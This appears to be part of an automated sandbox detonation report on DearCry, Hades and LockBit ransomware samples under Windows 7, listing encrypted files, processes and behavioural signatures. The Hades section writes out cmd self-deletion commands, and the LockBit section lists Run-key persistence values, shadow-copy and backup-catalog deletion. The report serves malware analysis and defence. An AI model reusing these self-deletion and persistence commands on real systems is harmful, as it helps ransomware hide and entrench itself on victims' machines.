| File opened for modification | C:\Program Files\Windows Sidebar\Gadgets\MediaCenter.Gadget\settings.html | C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\DearCry_13_03_2021_1292KB.exe | N/A |
| File opened for modification | C:\Program Files (x86)\Common Files\microsoft shared\VC\msdia90.dll | C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\DearCry_13_03_2021_1292KB.exe | N/A |
| File opened for modification | C:\Program Files (x86)\Microsoft Office\Office14\PUBWIZ\CATALOG.XML | C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\DearCry_13_03_2021_1292KB.exe | N/A |
| File opened for modification | C:\Program Files\DVD Maker\Shared\DvdStyles\Shatter\NavigationUp_SelectionSubpicture.png | C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\DearCry_13_03_2021_1292KB.exe | N/A |
| File opened for modification | C:\Program Files\Internet Explorer\perfcore.dll | C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\DearCry_13_03_2021_1292KB.exe | N/A |
| File created | C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\platform\update_tracking\org-netbeans-modules-core-kit.xml.CRYPT | C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\DearCry_13_03_2021_1292KB.exe | N/A |
| File created | C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\platform\update_tracking\org-openide-filesystems.xml.CRYPT | C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\DearCry_13_03_2021_1292KB.exe | N/A |
| File opened for modification | C:\Program Files (x86)\Common Files\microsoft shared\OFFICE14\1033\xlsrvintl.dll | C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\DearCry_13_03_2021_1292KB.exe | N/A |
| File opened for modification | C:\Program Files (x86)\Windows Sidebar\Gadgets\RSSFeeds.Gadget\de-DE\css\flyout.css | C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\DearCry_13_03_2021_1292KB.exe | N/A |
| File opened for modification | C:\Program Files\VideoLAN\VLC\plugins\audio_filter\libspeex_resampler_plugin.dll | C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\DearCry_13_03_2021_1292KB.exe | N/A |
| File opened for modification | C:\Program Files\Windows Sidebar\Gadgets\Weather.Gadget\images\undocked_gray_foggy.png | C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\DearCry_13_03_2021_1292KB.exe | N/A |
| File created | C:\Program Files (x86)\Microsoft Office\Document Themes 14\Theme Fonts\Thatch.xml.CRYPT | C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\DearCry_13_03_2021_1292KB.exe | N/A |
| File opened for modification | C:\Program Files (x86)\Microsoft Office\Office14\1033\PUBFTSCM\SCHEME22.CSS | C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\DearCry_13_03_2021_1292KB.exe | N/A |
| File opened for modification | C:\Program Files (x86)\Microsoft Office\Office14\MSOSTYLE.DLL | C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\DearCry_13_03_2021_1292KB.exe | N/A |
| File created | C:\Program Files\Mozilla Firefox\defaults\pref\channel-prefs.js.CRYPT | C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\DearCry_13_03_2021_1292KB.exe | N/A |
| File opened for modification | C:\Program Files\Windows Sidebar\Gadgets\Clock.Gadget\images\novelty_h.png | C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\DearCry_13_03_2021_1292KB.exe | N/A |
| File created | C:\Program Files (x86)\Microsoft Office\Office14\PUBWIZ\DGCHKBRD.XML.CRYPT | C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\DearCry_13_03_2021_1292KB.exe | N/A |
| File opened for modification | C:\Program Files (x86)\Windows Sidebar\Gadgets\CPU.Gadget\fr-FR\cpu.html | C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\DearCry_13_03_2021_1292KB.exe | N/A |
| File created | C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\org.eclipse.ui.themes_1.0.1.v20140819-1717\css\e4-dark.css.CRYPT | C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\DearCry_13_03_2021_1292KB.exe | N/A |
| File created | C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\platform\update_tracking\org-openide-text.xml.CRYPT | C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\DearCry_13_03_2021_1292KB.exe | N/A |
| File opened for modification | C:\Program Files\Windows Sidebar\Gadgets\CPU.Gadget\en-US\cpu.html | C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\DearCry_13_03_2021_1292KB.exe | N/A |
| File created | C:\Program Files (x86)\Microsoft Office\Office14\Groove\ToolData\groove.net\GrooveProjectToolset\ProjectStatusIconsMask.bmp.CRYPT | C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\DearCry_13_03_2021_1292KB.exe | N/A |
| File opened for modification | C:\Program Files (x86)\Reference Assemblies\Microsoft\Framework\v3.0\de\PresentationFramework.resources.dll | C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\DearCry_13_03_2021_1292KB.exe | N/A |
| File opened for modification | C:\Program Files\Mozilla Firefox\freebl3.dll | C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\DearCry_13_03_2021_1292KB.exe | N/A |
| File opened for modification | C:\Program Files\Google\Chrome\Application\106.0.5249.119\notification_helper.exe | C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\DearCry_13_03_2021_1292KB.exe | N/A |
| File created | C:\Program Files\Java\jdk1.7.0_80\jre\bin\java.dll.CRYPT | C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\DearCry_13_03_2021_1292KB.exe | N/A |
| File created | C:\Program Files\Java\jdk1.7.0_80\jre\bin\javafx-font.dll.CRYPT | C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\DearCry_13_03_2021_1292KB.exe | N/A |
| File opened for modification | C:\Program Files\Windows Sidebar\Gadgets\Clock.Gadget\images\settings_left_pressed.png | C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\DearCry_13_03_2021_1292KB.exe | N/A |
| File opened for modification | C:\Program Files\Windows Sidebar\Gadgets\Weather.Gadget\es-ES\settings.html | C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\DearCry_13_03_2021_1292KB.exe | N/A |
| File opened for modification | C:\Program Files\Internet Explorer\DiagnosticsHub.DataWarehouse.dll | C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\DearCry_13_03_2021_1292KB.exe | N/A |
| File created | C:\Program Files\VideoLAN\VLC\plugins\video_filter\libblendbench_plugin.dll.CRYPT | C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\DearCry_13_03_2021_1292KB.exe | N/A |
| File created | C:\Program Files (x86)\Microsoft Office\Office14\Groove\ToolData\groove.net\CommonData\AlertImage_FileHigh.jpg.CRYPT | C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\DearCry_13_03_2021_1292KB.exe | N/A |
| File created | C:\Program Files\Mozilla Firefox\api-ms-win-crt-process-l1-1-0.dll.CRYPT | C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\DearCry_13_03_2021_1292KB.exe | N/A |
| File opened for modification | C:\Program Files\Windows Sidebar\Gadgets\Clock.Gadget\fr-FR\css\clock.css | C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\DearCry_13_03_2021_1292KB.exe | N/A |
| File created | C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\PH03012U.BMP.CRYPT | C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\DearCry_13_03_2021_1292KB.exe | N/A |
| File created | C:\Program Files (x86)\Microsoft Office\Office14\Groove\ToolData\groove.net\GrooveForms4\FormsStyles\SoftBlue.css.CRYPT | C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\DearCry_13_03_2021_1292KB.exe | N/A |
| File opened for modification | C:\Program Files\DVD Maker\Shared\DvdStyles\Push\1047_576black.png | C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\DearCry_13_03_2021_1292KB.exe | N/A |
| File opened for modification | C:\Program Files\Java\jre7\bin\management.dll | C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\DearCry_13_03_2021_1292KB.exe | N/A |
| File opened for modification | C:\Program Files\Microsoft Games\Mahjong\Mahjong.dll | C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\DearCry_13_03_2021_1292KB.exe | N/A |
| File opened for modification | C:\Program Files (x86)\Microsoft Office\Office14\1033\PUBFTSCM\SCHEME23.CSS | C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\DearCry_13_03_2021_1292KB.exe | N/A |
| File created | C:\Program Files (x86)\Microsoft Office\Office14\Groove\ToolData\groove.net\GrooveForms\FieldTypePreview\CONTACT.JPG.CRYPT | C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\DearCry_13_03_2021_1292KB.exe | N/A |
| File opened for modification | C:\Program Files (x86)\Windows Sidebar\Gadgets\PicturePuzzle.Gadget\de-DE\picturePuzzle.html | C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\DearCry_13_03_2021_1292KB.exe | N/A |
| File created | C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\com.jrockit.mc.console.ui.notification_5.5.0.165303\com.jrockit.mc.console.ui.notification_contexts.xml.CRYPT | C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\DearCry_13_03_2021_1292KB.exe | N/A |
| File opened for modification | C:\Program Files\VideoLAN\VLC\lua\http\css\main.css | C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\DearCry_13_03_2021_1292KB.exe | N/A |
| File opened for modification | C:\Program Files\Windows Sidebar\Gadgets\Weather.Gadget\fr-FR\gadget.xml | C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\DearCry_13_03_2021_1292KB.exe | N/A |
| File opened for modification | C:\Program Files (x86)\Common Files\microsoft shared\OFFICE14\Office Setup Controller\PROPLUS\SETUP.XML | C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\DearCry_13_03_2021_1292KB.exe | N/A |
| File created | C:\Program Files (x86)\Microsoft Office\Office14\Groove\ToolBMPs\NotifierWindowMaskRTL.bmp.CRYPT | C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\DearCry_13_03_2021_1292KB.exe | N/A |
| File opened for modification | C:\Program Files\Windows Sidebar\wlsrvc.dll | C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\DearCry_13_03_2021_1292KB.exe | N/A |
| File opened for modification | C:\Program Files (x86)\Common Files\microsoft shared\DW\DW20.EXE | C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\DearCry_13_03_2021_1292KB.exe | N/A |
| File created | C:\Program Files (x86)\Microsoft Office\Office14\PROOF\MSSP7ES.DLL.CRYPT | C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\DearCry_13_03_2021_1292KB.exe | N/A |
| File created | C:\Program Files (x86)\Microsoft Office\Stationery\1033\NOTEBOOK.HTM.CRYPT | C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\DearCry_13_03_2021_1292KB.exe | N/A |
| File created | C:\Program Files (x86)\Microsoft Office\Office14\CONVERT\1033\LOCALDV.DLL.CRYPT | C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\DearCry_13_03_2021_1292KB.exe | N/A |
| File created | C:\Program Files (x86)\Microsoft Office\Office14\Groove\ToolData\groove.net\GrooveForms3\FORM.JS.CRYPT | C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\DearCry_13_03_2021_1292KB.exe | N/A |
| File opened for modification | C:\Program Files (x86)\Reference Assemblies\Microsoft\Framework\v3.5\es\Microsoft.Build.Utilities.v3.5.resources.dll | C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\DearCry_13_03_2021_1292KB.exe | N/A |
| File opened for modification | C:\Program Files\DVD Maker\Shared\DvdStyles\Stacking\NavigationUp_SelectionSubpicture.png | C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\DearCry_13_03_2021_1292KB.exe | N/A |
| File opened for modification | C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\features\org.eclipse.babel.nls_eclipse_ja_4.4.0.v20140623020002\feature.xml | C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\DearCry_13_03_2021_1292KB.exe | N/A |
| File opened for modification | C:\Program Files\Windows Sidebar\Gadgets\MediaCenter.Gadget\images\Gadget_Main_Background_Loading.png | C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\DearCry_13_03_2021_1292KB.exe | N/A |
| File opened for modification | C:\Program Files\Windows Sidebar\Gadgets\SlideShow.Gadget\es-ES\css\settings.css | C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\DearCry_13_03_2021_1292KB.exe | N/A |
Processes
C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\DearCry_13_03_2021_1292KB.exe
"C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\DearCry_13_03_2021_1292KB.exe"
Network
Files
C:\MSOCache\All Users\{90140000-0011-0000-0000-0000000FF1CE}-C\ProPlusWW.xml
C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\org.eclipse.ui.themes_1.0.1.v20140819-1717\images\winXPBluTSFrame.png
C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\platform\config\Modules\org-openide-windows.xml
C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\platform\config\Modules\org-openide-util-enumerations.xml
C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\platform\update_tracking\org-netbeans-spi-quicksearch.xml
C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\profiler\config\Modules\org-netbeans-lib-profiler-ui.xml
C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\profiler\update_tracking\org-netbeans-modules-profiler-snaptracer.xml
C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\visualvm\config\Modules\com-sun-tools-visualvm-sa.xml
C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\visualvm\update_tracking\com-sun-tools-visualvm-threaddump.xml
C:\Program Files (x86)\Common Files\microsoft shared\OFFICE14\Office Setup Controller\Office.en-us\OfficeMUISet.XML
C:\Program Files (x86)\Microsoft Office\Document Themes 14\Theme Colors\Module.xml
C:\Program Files (x86)\Microsoft Office\Document Themes 14\Theme Colors\Hardcover.xml
C:\Program Files (x86)\Microsoft Office\Document Themes 14\Theme Colors\Technic.xml
C:\Program Files (x86)\Microsoft Office\Document Themes 14\Theme Colors\Urban.xml
C:\Program Files (x86)\Microsoft Office\Office14\Groove\ToolBMPs\TipsImageMask.bmp
C:\Program Files (x86)\Microsoft Office\Office14\Groove\ToolData\groove.net\GrooveForms3\FormsViewAttachmentIconsMask.bmp
C:\Program Files (x86)\Microsoft Office\Office14\OutlookAutoDiscover\YAHOO.CO.TH.XML
C:\Program Files (x86)\Microsoft Office\Office14\OutlookAutoDiscover\YAHOO.COM.AU.XML
C:\Program Files (x86)\Microsoft Office\Office14\OutlookAutoDiscover\YAHOO.COM.XML
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\DesktopSharingHub\readme.txt
C:\Users\Admin\AppData\Local\Microsoft\Feeds Cache\UGUBWRQR\desktop.ini
C:\Users\Admin\AppData\Local\Microsoft\Internet Explorer\Tiles\pin9728060290\msapplication.xml
C:\ProgramData\Microsoft\Windows\Caches\{41462E22-6FAD-4079-8CD7-8D2731E4A375}.2.ver0x0000000000000002.db
C:\ProgramData\Microsoft\Windows\Caches\{2388BCF4-53D9-4E4F-92D4-56774A7C0F36}.2.ver0x0000000000000001.db
C:\ProgramData\Microsoft\Windows\Caches\{1D2729A6-BF93-41C5-9972-10C6A9D3FDA8}.2.ver0x0000000000000001.db
C:\Users\desktop.ini
Analysis: behavioral25
Detonation Overview
Submitted
2024-07-07 14:07
Reported
2024-07-07 14:40
Platform
win7-20240704-en
Max time kernel
1443s
Max time network
1454s
Command Line
Signatures
Hades Ransomware
Hades payload
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
CryptOne packer
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
Renames multiple (246) files with added filename extension
Deletes itself
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\system32\cmd.exe | N/A |
Executes dropped EXE
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Admin\AppData\Roaming\Play8Pla\Wwan | N/A |
Loads dropped DLL
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Hades_29_03_2021_1909KB.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Hades_29_03_2021_1909KB.exe | N/A |
Suspicious use of WriteProcessMemory
Views/modifies file attributes
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\system32\attrib.exe | N/A |
| N/A | N/A | C:\Windows\system32\attrib.exe | N/A |
Processes
C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Hades_29_03_2021_1909KB.exe
"C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Hades_29_03_2021_1909KB.exe"
C:\Users\Admin\AppData\Roaming\Play8Pla\Wwan
C:\Users\Admin\AppData\Roaming\Play8Pla\Wwan /go
C:\Windows\system32\cmd.exe
cmd /c waitfor /t 10 pause /d y & attrib -h "C:\Users\Admin\AppData\Roaming\Play8Pla\Wwan" & del "C:\Users\Admin\AppData\Roaming\Play8Pla\Wwan" & rd "C:\Users\Admin\AppData\Roaming\Play8Pla\"
C:\Windows\system32\cmd.exe
cmd /c waitfor /t 10 pause /d y & attrib -h "C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Hades_29_03_2021_1909KB.exe" & del "C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Hades_29_03_2021_1909KB.exe" & rd "C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\"
C:\Windows\system32\waitfor.exe
waitfor /t 10 pause /d y
C:\Windows\system32\waitfor.exe
waitfor /t 10 pause /d y
C:\Windows\system32\attrib.exe
attrib -h "C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Hades_29_03_2021_1909KB.exe"
C:\Windows\system32\attrib.exe
attrib -h "C:\Users\Admin\AppData\Roaming\Play8Pla\Wwan"
Network
Files
\Users\Admin\AppData\Roaming\Play8Pla\Wwan
C:\MSOCache\All Users\{90140000-0011-0000-0000-0000000FF1CE}-C\HOW-TO-DECRYPT-gn9cj.txt
Analysis: behavioral29
Detonation Overview
Submitted
2024-07-07 14:07
Reported
2024-07-07 16:12
Platform
win7-20240705-en
Max time kernel
1561s
Max time network
1570s
Command Line
Signatures
Lockbit
Deletes shadow copies
Modifies boot configuration data using bcdedit
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\system32\bcdedit.exe | N/A |
| N/A | N/A | C:\Windows\system32\bcdedit.exe | N/A |
Renames multiple (9368) files with added filename extension
Deletes backup catalog
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\system32\wbadmin.exe | N/A |
Deletes itself
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\SysWOW64\cmd.exe | N/A |
Adds Run key to start application
| Description | Indicator | Process | Target |
| Set value (str) | \REGISTRY\USER\S-1-5-21-3502430532-24693940-2469786940-1000\Software\Microsoft\Windows\CurrentVersion\Run\XO1XADpO01 = "\"C:\\Users\\Admin\\AppData\\Local\\Temp\\RansomwareSamples\\LockBit_14_02_2021_146KB.exe\"" | C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\LockBit_14_02_2021_146KB.exe | N/A |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Run\{2C5F9FCC-F266-43F6-BFD7-838DAE269E11} = "C:\\Users\\Admin\\Desktop\\LockBit-note.hta" | C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\LockBit_14_02_2021_146KB.exe | N/A |
Enumerates connected drives
| Description | Indicator | Process | Target |
| File opened (read-only) | \??\F: | C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\LockBit_14_02_2021_146KB.exe | N/A |
Sets desktop wallpaper using registry
| Description | Indicator | Process | Target |
| Set value (str) | \REGISTRY\USER\S-1-5-21-3502430532-24693940-2469786940-1000\Control Panel\Desktop\Wallpaper = "C:\\Users\\Admin\\AppData\\Local\\Temp\\6CA8.tmp.bmp" | C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\LockBit_14_02_2021_146KB.exe | N/A |
Suspicious use of NtSetInformationThreadHideFromDebugger
Drops file in Program Files directory
| Description | Indicator | Process | Target |
| File opened for modification | C:\Program Files\Windows Sidebar\Gadgets\PicturePuzzle.Gadget\Images\settings_divider_right.png | C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\LockBit_14_02_2021_146KB.exe | N/A |
| File opened for modification | C:\Program Files\DVD Maker\de-DE\OmdProject.dll.mui | C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\LockBit_14_02_2021_146KB.exe | N/A |
| File opened for modification | C:\Program Files\DVD Maker\Shared\DvdStyles\Sports\sports_disc_mask.png | C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\LockBit_14_02_2021_146KB.exe | N/A |
| File opened for modification | C:\Program Files\Java\jdk1.7.0_80\jre\lib\zi\America\Bahia_Banderas | C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\LockBit_14_02_2021_146KB.exe | N/A |
| File opened for modification | C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\visualvm\modules\com-sun-tools-visualvm-coredump.jar | C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\LockBit_14_02_2021_146KB.exe | N/A |
| File opened for modification | C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\SO02048_.WMF | C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\LockBit_14_02_2021_146KB.exe | N/A |
| File opened for modification | C:\Program Files (x86)\Microsoft Office\Document Themes 14\Civic.thmx | C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\LockBit_14_02_2021_146KB.exe | N/A |
| File opened for modification | C:\Program Files (x86)\Microsoft Office\Office14\PAGESIZE\PGMN102.XML | C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\LockBit_14_02_2021_146KB.exe | N/A |
| File opened for modification | C:\Program Files (x86)\Microsoft Office\Office14\PUBWIZ\BROCHURE.XML | C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\LockBit_14_02_2021_146KB.exe | N/A |
| File opened for modification | C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\platform\update_tracking\org-openide-dialogs.xml | C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\LockBit_14_02_2021_146KB.exe | N/A |
| File opened for modification | C:\Program Files\Windows Sidebar\Gadgets\PicturePuzzle.Gadget\es-ES\settings.html | C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\LockBit_14_02_2021_146KB.exe | N/A |
| File opened for modification | C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\DD00449_.WMF | C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\LockBit_14_02_2021_146KB.exe | N/A |
| File opened for modification | C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\J0107258.WMF | C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\LockBit_14_02_2021_146KB.exe | N/A |
| File opened for modification | C:\Program Files (x86)\Windows Sidebar\Gadgets\Weather.Gadget\ja-JP\css\weather.css | C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\LockBit_14_02_2021_146KB.exe | N/A |
| File opened for modification | C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\J0099204.WMF | C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\LockBit_14_02_2021_146KB.exe | N/A |
| File opened for modification | C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\J0199429.WMF | C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\LockBit_14_02_2021_146KB.exe | N/A |
| File opened for modification | C:\Program Files (x86)\Microsoft Office\MEDIA\OFFICE14\AUTOSHAP\BD18196_.WMF | C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\LockBit_14_02_2021_146KB.exe | N/A |
| File opened for modification | C:\Program Files (x86)\Microsoft Office\Office14\1033\QuickStyles\Modern.dotx | C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\LockBit_14_02_2021_146KB.exe | N/A |
| File opened for modification | C:\Program Files\DVD Maker\Shared\DvdStyles\Sports\NextMenuButtonIcon.png | C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\LockBit_14_02_2021_146KB.exe | N/A |
| File opened for modification | C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\org.eclipse.core.net.nl_zh_4.4.0.v20140623020002.jar | C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\LockBit_14_02_2021_146KB.exe | N/A |
| File opened for modification | C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\org.eclipse.equinox.p2.garbagecollector_1.0.200.v20131115-1210.jar | C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\LockBit_14_02_2021_146KB.exe | N/A |
| File opened for modification | C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\org.eclipse.ui.themes_1.0.1.v20140819-1717\images\winClassicHandle.png | C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\LockBit_14_02_2021_146KB.exe | N/A |
| File opened for modification | C:\Program Files (x86)\Microsoft Office\Office14\PUBWIZ\DGSIDEBR.XML | C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\LockBit_14_02_2021_146KB.exe | N/A |
| File opened for modification | C:\Program Files (x86)\Windows Sidebar\Gadgets\Currency.Gadget\fr-FR\js\init.js | C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\LockBit_14_02_2021_146KB.exe | N/A |
| File opened for modification | C:\Program Files (x86)\Microsoft Office\Office14\Groove\ToolData\groove.net\GrooveProjectToolset\ProjectTool\Project Report Type\Basic\DEFAULT.XSL | C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\LockBit_14_02_2021_146KB.exe | N/A |
| File opened for modification | C:\Program Files (x86)\Windows Sidebar\Gadgets\Weather.Gadget\de-DE\css\localizedSettings.css | C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\LockBit_14_02_2021_146KB.exe | N/A |
| File opened for modification | C:\Program Files\Java\jdk1.7.0_80\db\bin\NetworkServerControl | C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\LockBit_14_02_2021_146KB.exe | N/A |
| File opened for modification | C:\Program Files (x86)\Adobe\Reader 9.0\Reader\Tracker\tr.gif | C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\LockBit_14_02_2021_146KB.exe | N/A |
| File opened for modification | C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\J0105338.WMF | C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\LockBit_14_02_2021_146KB.exe | N/A |
| File opened for modification | C:\Program Files (x86)\Microsoft Office\Office14\1033\GrooveForms5\FormsStyles\SpringGreen\BUTTON.GIF | C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\LockBit_14_02_2021_146KB.exe | N/A |
| File opened for modification | C:\Program Files\Java\jdk1.7.0_80\jre\lib\zi\America\Nassau | C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\LockBit_14_02_2021_146KB.exe | N/A |
| File opened for modification | C:\Program Files\Java\jdk1.7.0_80\jre\lib\zi\Pacific\Palau | C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\LockBit_14_02_2021_146KB.exe | N/A |
| File opened for modification | C:\Program Files (x86)\Windows Sidebar\Gadgets\CPU.Gadget\it-IT\css\cpu.css | C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\LockBit_14_02_2021_146KB.exe | N/A |
| File opened for modification | C:\Program Files (x86)\Microsoft Office\Office14\Groove\ToolData\groove.net\GrooveForms\utilityfunctions.js | C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\LockBit_14_02_2021_146KB.exe | N/A |
| File created | C:\Program Files (x86)\Microsoft Office\Templates\1033\Access\WSS\Restore-My-Files.txt | C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\LockBit_14_02_2021_146KB.exe | N/A |
| File opened for modification | C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\org.eclipse.equinox.p2.metadata_2.2.0.v20131211-1531.jar | C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\LockBit_14_02_2021_146KB.exe | N/A |
| File opened for modification | C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\org.eclipse.equinox.p2.ql.nl_zh_4.4.0.v20140623020002.jar | C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\LockBit_14_02_2021_146KB.exe | N/A |
| File opened for modification | C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\J0287417.WMF | C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\LockBit_14_02_2021_146KB.exe | N/A |
| File opened for modification | C:\Program Files (x86)\Microsoft Office\MEDIA\OFFICE14\BULLETS\BD14983_.GIF | C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\LockBit_14_02_2021_146KB.exe | N/A |
| File opened for modification | C:\Program Files\Java\jre7\lib\zi\America\Argentina\Buenos_Aires | C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\LockBit_14_02_2021_146KB.exe | N/A |
| File opened for modification | C:\Program Files (x86)\Microsoft Office\MEDIA\OFFICE14\BULLETS\BD15022_.GIF | C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\LockBit_14_02_2021_146KB.exe | N/A |
